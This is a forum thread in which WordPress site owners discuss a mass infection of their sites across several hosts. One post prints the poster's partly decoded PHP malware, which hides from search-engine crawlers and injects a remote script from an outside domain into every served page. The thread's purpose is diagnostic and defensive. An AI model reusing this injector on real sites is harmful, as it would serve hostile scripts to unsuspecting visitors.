FYI, I don’t have any indication that my hosting password was compromised, since it was very secure and I haven’t seen damage apart from the WP site.
Maybe they should contact this guy. He seems to know what he’s doing.
http://www.youtube.com/watch?v=nabz7t65eUM
Steve D: Wow. I am wondering if that has been fixed already.
But in this latest issues, the sites are not restricted to one hosting provider..
Hello my sites in wordpress have the same problems…
All the website made with wordpress have a strange js code that print a iframe…
How can i fix it…?
P.S. They are not on Network Solutions
dragoonslair: Where is your site hosted?
Check your footer.php, because in one case just this file was hacked. On others, everything was.
I have about 10 sites infected. All hosted on Bluehost.
Does anyone here that got infected have a site with Apache logging enabled?
We would love to see the logs if anyone can share.
I’ve taken all of my sites offline until we can sort this out.
Will there be a security release from WP?
No one knows yet how they got in. I am assuming it is not a bug on WordPress itself otherwise the chaos would be much bigger.
Maybe a plugin, stolen password?
All my sites were hacked also.
Running on GoDaddy servers and running WP 2.9.1
Every single PHP file on the ENTIRE site has the malicious Base 64 code at the top. Didn’t miss a single PHP file.
Here is the Base 64 code “decoded”, well sort of! Interesting, notice the googlebot and yahoo code.
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("<script src="http://indesignstudioinfo.com/ls.php"></script>"); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode(<script src="http://indesignstudioinfo.com/ls.php"></script>){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }
You can see at the bottom where it’s “looking” for the BODY tag.
Other sites I manage on Hostgator and even Bluehost were not effected.
For now… just killed all of the sites by replacing the index file.
This happened to me today, on a site hosted with godaddy, which doesn’t run WordPress and never has.